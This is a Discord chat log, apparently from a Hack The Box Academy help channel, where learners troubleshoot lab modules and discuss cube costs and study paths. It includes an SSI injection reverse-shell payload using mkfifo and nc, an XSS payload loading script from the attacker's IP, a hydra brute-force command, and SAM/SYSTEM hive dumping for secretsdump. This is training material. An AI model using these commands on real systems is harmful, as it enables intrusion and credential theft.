it means your Backup is missing some stuff

ahh gotcha that's waht iT ohught

delete your copy and redownload it

kk

it looks like yours is missing part of the partition table

kk

thanks fior the help!

np

(I also suggested this like an hour ago)

yea Ik I saw that, but I wanted to try whyat you were saying first before I do that

¯_(ツ)_/¯

imo it would have been the first thing I did

true

especially if you get hit with the good ole

Who’s familiar and or know about go high level

well the question likely doesn't belong here

but also https://dontasktoask.com

(genuinely read that)

asking to ask (or seeking an expert) type question in asynchronous communication channels just takes longer to get answered

But you just answered me wouldn’t you have saved me time by you know just not answering

read and follow #welcome and maybe ask in #programming though, as an also serious note

I'm literally explaining to you why asking to ask is dumb

and you still didn't ask your question ¯_(ツ)_/¯

You’re dumb

https://tenor.com/view/adrian-broner-getting-cooked-cooked-aint-gone-lie-gif-2072784628130052433

Some people 🙄

Thank you emma

🤨

This new?

Yes

It's very poorly implemented

Some QA was definitely missed out on

I think this is a replacement for exercise tutoring
https://academy.hackthebox.com/news/7-dec-2022

I didnt see this existed either

Guys I’ve been doing the CRUDE API question still can’t figure out

It’s the question where I have to update a city name with “flag” and then delete a city, lastly search for a city “flag” to get the flag

Only if you enter the answer wrong so many times did it pop-up saying click here for help which pinged somone to reach out to you over discord

Thats pretty cool

Cool until you're spacing it, pasting in the wrong flag over and over again and then accidentally click the discord button. Then somone you're not expecting to reach out to you and you ignore the help request then realize that is what is was and you feel like an ass.

hey all im banging my head on SSI Injection Exploitation Example. I've got a netcat listener on port 9090, but nothing returns when i include the injection from the lesson, the page just loads forever. any help would be appreciated. the payload (used 10.x.x... IP): <!--#exec cmd="mkfifo /tmp/foo;nc <tun0 IP> 9090 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

nevermind. The lesson doesn't have much to do with getting the flag, there are otherways to get it.

guys I'm stuck at Limited file uploads in the file upload attack module, i can't seem to find a method to read the source code of upload.php, any hints?

Hey,I not sure if I get it wrong.
The amount of cubes and module I completed is not match

i think the payload example works doesn't it?

I completed 8 modules but my cubes around 40 (I only had single in-progress module)

on most modules you get back 20% of your cubes

Oh

I get it, thanks you

if you go to the dashboard and look at the modules it also shows you the number of cubes you get for completing it

I've tried the payload example and changed the resource=index.php to upload.php but it didn't have any effect

But again it will stay the same amount because tier 0 is actually cost 10 cubes

right

but most of the time you get 20% back from the total cost of the module once you complete it

I will complete current module and see it again

Hi, I have been doing the Password Attacks Lab -Hard. I have tried to bruteforce the mutated password list filtered by length >=10, hydra cracked for R* service. However, the password doesn't work when I try to connect to the service using the password. I have been running crackmapexec on another S* service. But it is taking too long.

I just tested it again, they provide how to do it in the section. you can DM me if you need help.

crackmapexec command completed, but it couldn't find anything for S* server. Any hints would be highly appreciated!

rdp is indeed the foothold

i've heard crowbar is better for rdp than CME or hydra

also idk where you got the password would be >=10 chars

i'm looking at the pw in my notes: it's definitely less

From previous labs 😦

previous labs are independent in this instance (and most other instances)

basic rule of engagement: don't make assumptions

the password attack module definitely misleads you in the length of the passwords

it says to enumerate the password policy, how important it is, then completely ignores it later

even still i think you can do some enum to find min password length as i'm seeing in my notes that RPC is open

I know. I had checked the forums and they had stated that the password policy is length >=10, to increase the speed. So, I thought it would apply here as well. Turns out I am wrong 😦

it also says most passwords are x long and ignores that too

yeah

¯_(ツ)_/¯

obv not stating the pw length but unless i have it copied wrong; it's definitely <10

Thanks. I will try again

okay thanks will do! ima try

1

if i subscribed to the htb academy can i get access to the premium in htb labs

no

that's currently not a feature; but might be one in the future

given that they now do SSO

but atm still separate subscriptions and separate platforms

ok thx

Ok so,I got total of 40 cubes

Completed 9 tier 0 modules

your cube total will never increase by just doing modules

also make sure you fully complete a module and there's no sections or questions you missed

you should get a "finish and complete" button at the end

I'm pretty sure that I completely every section

just go through and click the green button that says "Mark Complete & Next" at the end of each section

That can happen?

?

You must made sure it said "finish and complete"?

Ye

Sometimes you miss a question

working on the file upload assessment and I've inspected the upload.php to determine the upload constraints. when I formulate my POST request I can print out the /etc/passwd, but when i try to filelist the root directory to find the flag name i just get a black reply. Any pointers to a kb online?

Pls is this the right place to ask questions relating to academy modules

Yes

You add the section and module where you stuck.
You type your question
If there is some spoiler stuff with example names and password you can hide em like b**, ppl who did the section wkll know

thank you guys for your hard work, i have a question please

I need to be able to list the root directory, but what doesn't appear to work is xxe directory listing, I just get the <svg></svg> response instead of a directory listing of the root dir. I assume that means I should try a different technique.

have been trying to download LinEnum on target host using wget while python server is running on my host but it keep retrying is there a way out

am at Nibble privillege Escalation

How are you trying to download it? Directly from github?

If so: the targets don't have internet access

wget http://my host ip:8080/LinEnum

wget http://my/ host ip:8080/LinEnum.sh

It's being autoformatted

Because of the space

while amd running python3 -m http.server 8080 in LinEnum dirctory

Anyway: is linenum 1: spelled like that and 2: in the directory you started the http server from

Do you see the request come through?

oh okay space on the target machine is there way out i need to get root privilege

?

not request coming

no

Then you're likely not inputting your ip correctly

http://10.10.x.x:8080

Unless you're meaning to tell me you're literally typing "my ip"

Can anyone give me a nudge for the file uploads skills assessment. I have be able to view the filtering logic in upload.php, and was subsequently able to download the /etc/passwd data, but for some reason a file listing through xxe doesn't work it just displays a blank output <svg></svg>.

You don't need to repeat yourself

You might need to try something different

i put in my kali ip not the vpn ip

That'll do it

thank you so much that works

Thank you guys

I just wanted to double check this, Attacking Common Services - Attacking FTP.

I've used the resource user and pws list files with medusa and got nothing, tried with hydra and got nothing
hydra -L <user list> -P <password list> target IP ftp -s <non standard port> -t1 -w10

Are we supposed to used the resource password list or rockyou

Rockyou would take forever

Its silly how long its even suggesting haha

23907:19h

it's already taken ages to go through the whole user list from resources once, as it is

Did you try ||anonymous||

yep

Doesn't sound like it

didn't work, according to nmap results also thats not possible

It should

ill try it again

ftp ip port

If you don't specify, it defaults to standard (21)

sigh

Thatll do it

Thanks ML

i think my first attempt at that was not correct obviously

You were trying to log into 21 anonymously

yep I think that would be why

Which, yes, was not feasible

Does it count optional exercises?

But even if it count,I only had a module that doesn't complete them

Yes

But those you generally type "DONE" and submit

T0 modules will always give you the cubes back you spend

So I need to check and complete them

T1 and above give 20%

So T0 doesn't actually increase cube?

I'm kind of lost again

Can i enroll my university in htb or it must be done by one of the uni staff?

Never said it did

For academy stuff? You'd have to message support

Not seeing how that equates to increase

Cost 10; reward 10

Then how I gonna increase more cube if I can't reach T1 in the first place lol

Sad

Buy a subscription

Completing modules will never give more modules than you spend

So I actually misunderstood all along

As shown in that table: you spend x cubes you get y cubes upon completion

(And throughout the module in some cases)

Oh and one more question,but it may not related here

Where can I see info about discord role in this server?

Wdym like "noob"?

It's tied to your htb labs rank

Yes, but also where can I see/read all role info?

in the modul windows priv escalation section Windows Built-in Groups, i have the flag, but understand something not in this section.
what can i do with after i did:
C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV

The operation completed successfully.

C:\htb> reg save HKLM\SAM SAM.SAV

The operation completed successfully.

You can use secretsdump to extract passwords from the files SYSTEM.SAV and SAM.SAV

ok, thanks that is what i thought..

but i find it bad expalined...

https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box

Thanks you

the first section would be Interactive Section right?

so why does it say its incorrect?

No

wdym?

The first section is not, in-fact, interactive section

Look two up lmao

Each module is broken down into pages/sections

Interactive sections isn't the first page of this module

Green check mark means you've completed that section

im getting a sense of tiredness im not sure why

yes and?

You've completed the first two sections

yes

Whats the first section with the green check mark

lmao

Because it seems like you know English, so you're just bad at reading

the Introduction

✨

Without "the"

but it was listed under table of contents

not under "Sections"

Yes as the first section

Yeah, and the table of contents is a list of sections.

Every item on the right side there is a section.

Go figure, the table of contents has all the sections

ohhh cuz i thought the list of cubes were subsections

Nope

im so stupid

Those just means completing that section gives cubes back

Yes 🗿

goodbye

You're going to have a lot of moments in your life where you feel stupid

Generally

@solid python can i Ask you something quick about the command injections module ? for the skill assessment ? i would be so happy 😄

those moments are the exact moments where you get smarter

I haven't done that module

i think im losing brain cells rn

ok no problem 😄

You can't live life without being wrong.

Take it slow, and read carefully. Genuine advice

Being wrong is the first step to being right

so the workstation is the vm?

It can be

Its a little weird in academy and labs

they offer an "in browser" virtual machine called PwnBox

this is what i have on my screen

Yep, thats pwnbox

The workstation is generally the pwnbox or your own vm

i see

Brother why do you still have internet explorer

I recommend using your own rather than the browser one, because the browser one is timed

so is PwnBox a Linux system

This is a windows 7 pc.

er

school ahh pc

Yes

and ik its dead

Ah if it's a school system then you're definitely limited on what you can install

Did your school give you this PC? Do you own it or does the school?

school

and its a desktop pc so

Yeah you won't be able to install your own VM on it

but i could do it on my computer at home

does it work on MacBooks

Imagine doing htb while in school

Virtualization in macbooks is possible but might require more involved configuring

no its after school

Virtualbox and VMware exists for MacBooks, free at least

ok thats good to know

UTM is paid

oh kak i have to go

my ride is here finally

ParrotOS isn't updated to latest for MacBooks

5.3 ARM/UTM download

macbooks are limited ngl

But iirc you can update it to 6.0 after

guys i have a question thats gonna make me sound stupider

whats a bash terminal

A terminal that runs bash

Like how powershell is its own terminal

A terminal is just a command line interface that is running an interpreter

is there anything you guys would recommend doing or learning between finishing infosec fundamentals and starting cpts?

Practicing patience /gen

well there's already been plenty of that on this path and there will be even more in cpts

Also be prepared to overthink a simple question because of wording

"Authenticate to" can mean many things

already do all the time

i think i'll finish the cisco networking course and probably start python between infosec fundamentals and cpts

I would genuinely tell you to focus on one thing at a time

so don't finish the cisco networking course or don't do python and cpts at the same time?

i'm not going to start the cisco networking course until i finish infosec fundamentals if that's what you thought i meant

Im working on the XSS module and I've been trying to get a response on either Netcat or PHP server for Session Hijacking. I've set up the script.js and index.php as instructed in the module. I've been going through all the User Registration fields and I haven't been able to get a single response on my PHP or NC listeners. I've tried all the payloads <script src=http://MY_IP:PORT/script.js></script>, etc. I've gone through a handful of the PayloadForAllThings and nothing has been able to reach back. There is something I'm missing and I'm not seeing it for some reason. My script.js script is also the one provided by the module and I made the change for MY_IP:PORT.

i feel you 🥲

Don't do python and cpts at the same time

Those skills don't really correlate much

Disregard my question. I had an extra ' and I my buddy to look and he saw it instantly xD

So you're spending tons of extra time splitting your brain function

ok that's interesting because weren't you in the conversation last night where i was asking why you would need to make your own tools and people were saying it's important to learn how they work

Yes, but cpts literally uses pre-made/out of the box tools

yeah i know and that's why i don't understand how making your own tools fits in besides learning how the tools work

anyone help "PoC and Patching - Unexpected Input" in the "Parameter Logic Bugs" module?
It is more difficult than skill assessment for me...

Cpts path also does a decent job at explaining the xoncepts

i guess i'll see what cpts has to say about python

So you're not just dropped into here's a tool with no concepts

doesn't cpts have an intro to python module or is that a different path

Almost nothing

Different path

shit

Cbbh is the coding one

cbbh has all the same modules as cpts and cdsa except for like 5

Cbbh is the coding/web pentest cert

Introduction to Python 3 is not in the Bug Bounty Hunter job role path

It is in my heart

it honestly should be

oh intro to python is only in the intro to binex path

maybe i'll just do that module after i finish infosec fundamentals just to get a basic grasp on the fundamentals

Python fundamentals aren't necessary for CPTS

You don't really do much full on coding

Just adjusting one liners

Or slapping a php in

yes, the classic nc tty upgrade

Nice tty

Have you tried pty

😳

if python3 is there, it's pty time

Stucko works for everything

ok what the hell should i learn python or not

and i mean yeah there isn't a lot of coding in pentesting but there's plenty of scripting

Up to you

I just am suggesting not to learn it concurrently

fair enough

Because nothing is gonna be reinforced

ok so i really want to learn python but if it's not necessary for cpts should i just learn it after i'm finished with cpts?

Sure

Like I'm not saying you can't do it at the same time

I'm just saying your knowledge isn't gonna be continually reinforced through practice with it

that's fair

idk i guess i'll see how well i'm learning

This is what I do. As people mentioned coding requires lots of brain power, I dont really like splitting it with something else.

So Sunday I take a break from pentest study and dedicate it fully to building python projects.

Does value in this context mean the string "value" or does it mean any non-zero number?

Hey All, I'm having a bit of trouble on question 3 of the "Skills Assessment - Using Web Proxies". I've managed to get a flag to show on multiple responses after using intruder to find the last value of the md5 value received from question 2. But the htb flag is not accepted. Does anyone happen to know what that question is actually looking for?

@next bronze

it's right there

which icon is it?

click on them to find out

I alr did lol

it's the green one

Not one of them is labeled Bash Terminal 🗿

For future reference what are some bash terminals called?

Does one look like a terminal with a bash symbol?

idk what's a bash symbol

I'm so dumb

Google it

Oh the dollar sign?

Uhu

Oh now i see it

Appreciate it ma brotha

Yo im new to this in gen, only did some HTML stuff for a course anyone know where to start and how i can get situated?

Im interested in learning a new skill

anyone for a nudge on question #3 NTLM Relay attacks skills assessment?

check shares and try passwords

Module: Attacking Common Applications, Section: Attacking Tomcat, Question: i have planted a WAR payload and successfully got a reverse shell, however I am unable to locate the Find and submit the contents of tomcat_flag.txt** I have used ls -al, however I still could not find the flag. I will appreciate a nudge.

right in front of my face as always. not sure how I made it this far in life

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

dollar sign

imagine money

oooof

discord not loading all, someone already answered

still appreciate it

i don't appreciate it

honestly if i get to rock bottom and i just somehow cant get out and its over, i might become like serial killer or smth

btw appreciate u have pentest certificate

this shit must be jard

hard*

@remote latch yo I feel that but maybe you should talk to someone about that bruh